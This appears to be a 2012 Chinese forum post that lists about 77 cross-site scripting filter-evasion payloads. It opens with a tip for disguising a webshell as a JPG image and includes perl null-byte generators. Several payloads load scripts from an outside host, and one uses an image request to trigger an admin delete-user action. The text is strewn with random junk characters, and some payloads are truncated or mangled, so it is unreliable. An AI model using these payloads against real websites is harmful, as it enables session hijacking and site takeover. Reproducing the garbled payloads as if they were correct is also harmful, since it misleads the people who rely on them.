跨站图片shell
' D/ u* I/ d8 d- p- s( [! n* aXSS跨站代码 <script>alert("")</script>) ^: @+ i2 n6 t8 ?3 }9 f: P5 `
5 L1 W! `; j$ @/ s将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马1 c0 Y* j( q/ N: r! i
( J; |: c1 n+ K7 y
7 W7 C0 d# Y8 \4 J$ l/ r9 f' L( n: p9 ]1 z9 b* l- ^% ~1 e
1)普通的XSS JavaScript注入( a) _$ J$ W+ H# `
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
Z1 b* b& p0 {" l, Y7 A
; J4 Q. i+ n% P! t* @(2)IMG标签XSS使用JavaScript命令' O/ l4 l+ H e9 I" ~1 d, W
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
8 G& e9 }* _7 Z) B. W+ o
6 Y" T0 x7 N- V, O1 G: L; r(3)IMG标签无分号无引号2 A; m$ z0 ~) {/ g
<IMG SRC=javascript:alert(‘XSS’)>
1 |8 n& n9 h _& ^, X$ i- [1 R5 y( }( j
(4)IMG标签大小写不敏感; w7 \6 ~9 P+ v& q) r2 q
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
* t- W( _ r# n
+ @! t0 L7 B" ^9 }5 `(5)HTML编码(必须有分号)
+ _: N0 d9 k& j0 i<IMG SRC=javascript:alert(“XSS”)>% K$ `0 g9 i) D
" X X- Y4 ^( M% o H5 m q. N; q* Z(6)修正缺陷IMG标签0 ?2 u, |/ f) v6 J7 r
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
6 |2 z+ T4 l- b9 z* x0 B+ y
( P& [- s$ Q& k. l0 l- Y(7)formCharCode标签(计算器)0 z, k- F8 z ]8 L9 D
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>5 X% U# F! j# g1 e
- P/ E: @7 ?* T: d7 @/ W
(8)UTF-8的Unicode编码(计算器); F, a0 \& U, a+ |8 S! H/ W
<IMG SRC=jav..省略..S')>4 p0 ^2 V0 _# f' I9 L+ d8 g2 T7 _! }
; z1 a* s( E2 F& P
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
; M, |- ?9 |9 m" |<IMG SRC=jav..省略..S')>! [& K/ ^/ X+ v4 z# r( y3 m' r
' R1 f) l0 I* w Y
(10)十六进制编码也是没有分号(计算器)
$ W) Q# G7 V9 O/ |, @( M4 V<IMG SRC=java..省略..XSS')>1 }% ]1 o3 {5 o1 i9 E
' Q1 @6 K2 w. Q8 g) U; C(11)嵌入式标签,将Javascript分开) Y7 \( m. ^+ A4 O A
<IMG SRC=”jav ascript:alert(‘XSS’);”>
9 Q% n4 u9 {" z4 G) W$ }
; [. U/ b" l6 N(12)嵌入式编码标签,将Javascript分开
4 }! z8 F# i6 g0 u( D3 F+ o- K<IMG SRC=”jav ascript:alert(‘XSS’);”>
1 a+ X' T9 }( e+ m1 e. h N: ~) N9 A) n6 B3 ~
(13)嵌入式换行符
0 Q9 f- h8 A, [0 Q8 R<IMG SRC=”jav ascript:alert(‘XSS’);”>
7 p2 R' [3 A, F- f" @* Y# H0 F; u2 c
& z7 I1 Q) Z. X4 @(14)嵌入式回车
8 l" Q+ y( Y3 ?& @5 s; Y6 t" `5 F<IMG SRC=”jav ascript:alert(‘XSS’);”>
4 ~, W: m5 I. ~) }3 y+ ?$ H3 i2 B0 u+ s2 N0 Y' R' Q
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
6 O5 v6 }# B4 {0 l5 |2 N Y/ y7 |# g<IMG SRC=”javascript:alert(‘XSS‘)”>
* p1 p2 ?' m) p% T# l. R* }' u# O* m5 `8 n x1 |
(16)解决限制字符(要求同页面)5 z5 V/ x1 ~+ O* d& q" ^. m$ D
<script>z=’document.’</script>
) E# _ ]# z. m<script>z=z+’write(“‘</script>2 Y6 Q: O! n5 N% F9 u3 P9 F
<script>z=z+’<script’</script>$ {+ j! q( H- c# M/ U! L S
<script>z=z+’ src=ht’</script>8 g9 {" N) W* C5 K- t. y
<script>z=z+’tp://ww’</script>/ a3 i; h' z: R2 g) `, \
<script>z=z+’w.shell’</script>
6 K! i) J( y' @( ?8 z8 v<script>z=z+’.net/1.’</script>
2 n8 b$ e* [9 ~) T( _<script>z=z+’js></sc’</script>/ t+ |/ Z2 M! u0 C& A
<script>z=z+’ript>”)’</script>
5 d) b8 n# {, K: u& R' T<script>eval_r(z)</script>
/ \6 z# u+ k; f- E4 p3 n- y
1 _/ R4 h3 c0 w(17)空字符
$ d9 ?' z8 @ ^# vperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out) N! _4 D H5 W' o8 e/ \& k# M" y
# h: f; ^/ E/ N) b5 O3 l+ q
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
/ ^% I' ?+ @9 d& ~5 hperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
; _/ w$ u$ W% v
; w; f( k7 U/ B1 V- o(19)Spaces和meta前的IMG标签. Q& u+ G" l8 T+ J$ H: N
<IMG SRC=” javascript:alert(‘XSS’);”>& g8 q/ z* p$ p6 d- x! E9 g
3 f, R# n( U1 C5 M; U s0 Q
(20)Non-alpha-non-digit XSS
/ b! R Z- q9 n/ A$ g3 \<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>' h7 X; ]4 L T: U; u5 l
0 A0 ^/ k. }' {& F4 q
(21)Non-alpha-non-digit XSS to 29 m0 h# P" Z' s
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>- q z8 y [ {- L3 W2 q& O* E4 }- h
% s; E5 Y# k3 x(22)Non-alpha-non-digit XSS to 3# s' M1 d, b' g6 b- N" Y+ B
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>* M" I, G1 M1 |5 w7 |
. `) U7 m- z( b% [8 F(23)双开括号
" f% t7 d2 M; o% @% i4 g<<SCRIPT>alert(“XSS”);//<</SCRIPT>
! a3 D2 F0 X% E) i; `& }. \7 \ b( d9 V, v# C% j+ V z2 ^
(24)无结束脚本标记(仅火狐等浏览器); K. D7 G3 k" m3 q* L
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
. [- q `! k9 q0 k1 C5 t
* G# y% W; T5 _0 [4 J a(25)无结束脚本标记2+ J6 d) p; i) ?1 s" P5 [6 @
<SCRIPT SRC=//3w.org/XSS/xss.js>: Q8 F) q' B+ H. t3 k1 g' j
! G. A* U4 L' D1 E3 h4 k- M
(26)半开的HTML/JavaScript XSS( W8 Q& _; R0 L$ p: j/ E
<IMG SRC=”javascript:alert(‘XSS’)”: r1 i2 d) M; f! E/ @
" B R) i! R7 s" Z$ J# G1 o% F+ F(27)双开角括号$ j$ b: v. m5 W1 H& v0 a3 n
<iframe src=http://3w.org/XSS.html <- }4 x$ S* e. Z
: S; ?& U5 t2 L+ X/ p(28)无单引号 双引号 分号
& u9 x$ z) N1 g: k<SCRIPT>a=/XSS/; J) j5 t% G# L- p9 d U7 A
alert(a.source)</SCRIPT>
0 C0 h+ t' p2 ~- `, K
6 L+ t( f5 G/ X6 `6 z, K(29)换码过滤的JavaScript
& @, H/ z8 E9 C% a+ O3 y3 {\”;alert(‘XSS’);//* \8 s. E; Y! f. ]
3 w( A# D! V0 S; H1 ~- y8 {(30)结束Title标签
' X8 B0 E" ~( n8 Z</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>: p" @+ q9 N0 G4 B; }, A
& C) J8 ? |( M7 {% r
(31)Input Image
" E. i$ j+ ~, r. Q5 r<INPUT SRC=”javascript:alert(‘XSS’);”>
E" f- x) i3 @9 c9 Z& l; t
0 B# i8 z) B x, o) u, o$ H(32)BODY Image
( P, r( V0 Y7 u' C<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
$ W* f5 P4 q" i: a9 b# ~$ G0 o& M+ I( Y# T8 s
(33)BODY标签2 M) t! l3 T9 z( v3 J+ A
<BODY(‘XSS’)>
1 H0 J3 Y( U, L8 `# @1 h8 l q3 b! J
(34)IMG Dynsrc
8 Z. m( q2 @1 y9 B3 U$ ]# D<IMG DYNSRC=”javascript:alert(‘XSS’)”>! @2 g5 j$ e# W# v
+ B0 _+ I0 T" A4 v; u
(35)IMG Lowsrc
! A, q: Y6 X7 B% R% A, K<IMG LOWSRC=”javascript:alert(‘XSS’)”>
- Y' J6 G' G* R0 o* @
- t1 P& ]* s r( A(36)BGSOUND3 E8 o5 E: }, [- E% A/ Y
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
8 c$ _( m$ g9 R, Y. d; [' T! u2 g/ |+ m+ n8 b
(37)STYLE sheet
. E0 F/ ~& v- b9 a ~9 A) l0 Q<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”> T6 K. d5 k% ?
& w& g' h9 b2 U6 g(38)远程样式表0 e* J5 |$ M2 P0 ~1 A
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>4 T3 G' ^2 C z" n! a
5 S! m/ {. a) {2 j+ E+ b5 P) j! z
(39)List-style-image(列表式)
( v0 x* p e4 [<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS' |* {) J' l! q( \1 @: P
: W* w p+ [: B/ L
(40)IMG VBscript
9 }0 J9 R$ a1 V5 l/ }1 B, Y* }<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS$ ^: F" x4 t, x- X4 n0 u, v- V7 N
0 `* h9 v8 |4 k! ?3 C4 ?(41)META链接url
/ _4 @( s( h& V0 c- D& C2 m9 v" A9 b<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
3 p! T2 J R8 B8 j2 C1 X8 n" Z9 L& g3 x! I$ Y+ H" L
(42)Iframe
0 K2 P& B7 c. G1 }2 S<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
T0 _. m: t" j. p- h4 U(43)Frame" j3 B/ e( r9 g+ \
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
8 g. q9 j5 m3 l5 m, m# I3 g; i5 y" u& [
(44)Table h- T' A8 ~* \: ?8 v
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
! ?5 G6 A3 U7 i# l. G" S1 F n: P
(45)TD0 F+ k2 h! l, v1 B5 b2 w
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
! |- T! m9 a- t5 H; u6 Q, ^6 q/ x- A. ?; ~0 k3 i; o
(46)DIV background-image
$ l" ]; T5 u( ^9 |( V, H ? Y<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>3 k& C8 I4 z1 O/ o& U; o
' b, ]: {, b% |. Z" F(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
: w2 x6 m& `" n1 F# m<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>4 i+ g! Q2 S% H% }3 j: [* H
; b B' p' k) W0 @5 D. x: n1 I
(48)DIV expression' s' T0 E5 F6 b, K {
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
6 {3 o& y, s" k6 Q/ Z
7 Z7 J' ^. ? x( A(49)STYLE属性分拆表达
/ l3 `0 V2 @/ i7 |/ r! }<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
# {& g$ G- u$ ?; H! _) m! U9 g/ k2 {6 a2 @0 e
(50)匿名STYLE(组成:开角号和一个字母开头)+ K. {9 ?6 @6 y0 E ~0 `
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
8 G3 u( ?/ a- j; }' |9 f. g# u: |1 X3 [3 V( u i; Q8 T& h8 f% W
(51)STYLE background-image9 ?8 h: A! \- M/ m& l5 p) i2 |
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
+ a, w" R: l6 T9 R% |, ?6 i; P& R; j4 |! _+ m" l, S( v7 |; y3 }% ]6 @
(52)IMG STYLE方式" ~% e, v& k# [" `3 E1 E
exppression(alert(“XSS”))’>
2 H/ d: E8 `* n8 A1 g" |9 S2 z v% [% I9 q* q/ W
(53)STYLE background
) u9 s( W5 J* \" L<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>- r) }( B' N% }6 o: b9 k. i
3 h& n5 r& ^* P: r(54)BASE
3 E2 y" z; z. ]" |$ m<BASE HREF=”javascript:alert(‘XSS’);//”>
$ N$ l2 ^8 g' k
6 j" G+ l- k& ^& s' C" G(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
# H( \6 h/ e" t. z6 W2 l<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED> g8 |! L, D$ n/ c- T
3 u4 y) v% W0 k* ](56)在flash中使用ActionScrpt可以混进你XSS的代码6 {; s. @9 J0 J$ I
a=”get”;
0 K+ ~7 C5 p* |. Z0 R' lb=”URL(\”";
2 n1 M7 \; l7 c3 X* Ec=”javascript:”;
) C. v; @. h- s9 G8 xd=”alert(‘XSS’);\”)”;5 m3 c& M1 V8 e0 ]" x3 G* m2 m9 r, ?$ t
eval_r(a+b+c+d);
( n5 s5 t2 s" G9 ?4 E- R+ C# d; @$ O$ |( d* m
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上& ?8 R0 s6 C- k. d9 d: z
<HTML xmlns:xss>3 G3 s+ Q, g5 H2 @
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>. U) O. Q" E4 h K
<xss:xss>XSS</xss:xss>* M- Z8 z* J; D3 l* K1 C5 b
</HTML>
5 a g+ h6 Q c* q5 N4 K' }" D
9 c) A0 r) s& ^(58)如果过滤了你的JS你可以在图片里添加JS代码来利用" F m, Z& Y2 y4 v* o! S2 Z
<SCRIPT SRC=””></SCRIPT>
8 |0 P7 k7 s7 G! Q- v3 i
$ Q. x# \# s/ Y. @* m(59)IMG嵌入式命令,可执行任意命令
4 h3 ]' y: i" n<IMG SRC=”http://www.XXX.com/a.php?a=b”>2 m6 d$ A4 r" a, I
5 i% j4 x2 i( d" O0 l/ C(60)IMG嵌入式命令(a.jpg在同服务器)$ y& W; t* T4 i# E9 X
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
. j, d9 c; b: v5 ~4 ]/ s; q% Q$ a( ^/ A# \8 E
(61)绕符号过滤
- @9 h, T# L9 X( E2 m0 E<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
- o* @- J3 `( R, H3 I' r" O" J" `! ^+ j$ e# l
(62)
7 a$ @7 Y' t) y2 N<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
) {: ?( g& A9 h2 X6 S; @3 u) n+ ~( R2 @% I9 _. ^# c
(63)
# s, ?8 G4 o2 q6 m# `6 W( o<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
# l. h* R6 @4 x3 T- t7 b2 H2 }
+ N4 N& T* s# I- X(64)/ m1 }7 h+ O+ c, x7 h$ ]8 G" t
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
; |- h/ a. J: s& V) G+ S9 `! }0 ]* I4 v
(65)
+ l% {; b2 D- E; S3 b8 Y2 Z3 Q+ v( u<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
6 Y2 }4 L2 F+ g: V# m/ u1 O! w! w6 O2 A# C+ R
(66)
D5 \; [2 e! ?- G# s<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>, l5 d( R7 o; ]$ O2 H7 m
- ^( ]( i1 M( R0 O- `(67)
% n6 t: e( R9 @+ c/ Z<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>! X m! J6 T {! v* R9 I6 k
* Q. Z3 E' F! e& B+ {
(68)URL绕行3 l3 a# z2 z' i: s y0 ^, t
<A HREF=”http://127.0.0.1/”>XSS</A>
1 ~, {* D$ F2 B% B
& X a* [& {* L% C7 f+ [3 g+ ]) p: |(69)URL编码# b/ o* _, A1 U, ~, L
<A HREF=”http://3w.org”>XSS</A>
6 d5 k/ U+ b' J G. }8 y8 \* [2 M6 R
(70)IP十进制
* B9 ]% z) ~8 A' G" H$ e) T& g3 ~<A HREF=”http://3232235521″>XSS</A>% B% m" y( y" I' y
/ y, s: t- W; S
(71)IP十六进制
# Y) W+ B& x8 F; z<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
0 h: V* ~6 T" l# o8 B2 ^
9 o l7 `$ a: r$ U(72)IP八进制' m+ N4 d, ~, g S0 X& h! d
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
" s; O6 G, j- {
7 k& O5 @4 V4 |(73)混合编码" [1 Y E8 V3 a
<A HREF=”h
" p% n% Q7 r; F$ E7 i/ V5 Ztt p://6 6.000146.0×7.147/”">XSS</A>
2 ], a& S, ]9 h3 v) j! p! N) j+ l9 L
(74)节省[http:]1 j; r% l( v* X
<A HREF=”//www.google.com/”>XSS</A>
2 A& f% |8 O; g4 t% a* X5 R7 |5 v. Y Q- M
(75)节省[www], |1 [/ D* k, Q3 j* S( M
<A HREF=”http://google.com/”>XSS</A>
9 R* ^, @6 ?; g
( _: m6 V" S4 V/ \(76)绝对点绝对DNS
0 @6 Z; Q [ B5 {: h* c* }<A HREF=”http://www.google.com./”>XSS</A>
6 S. z% J7 C W4 N5 F3 U) ?1 [" O& O& C2 l3 I( C3 o3 k
(77)javascript链接! D6 }8 ]! d% p4 H- h8 `$ y
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>, _5 C0 G) `6 j0 V8 n5 A. c: C$ q. `
|
发表于 2012-9-13 17:04:56
收藏
支持
反对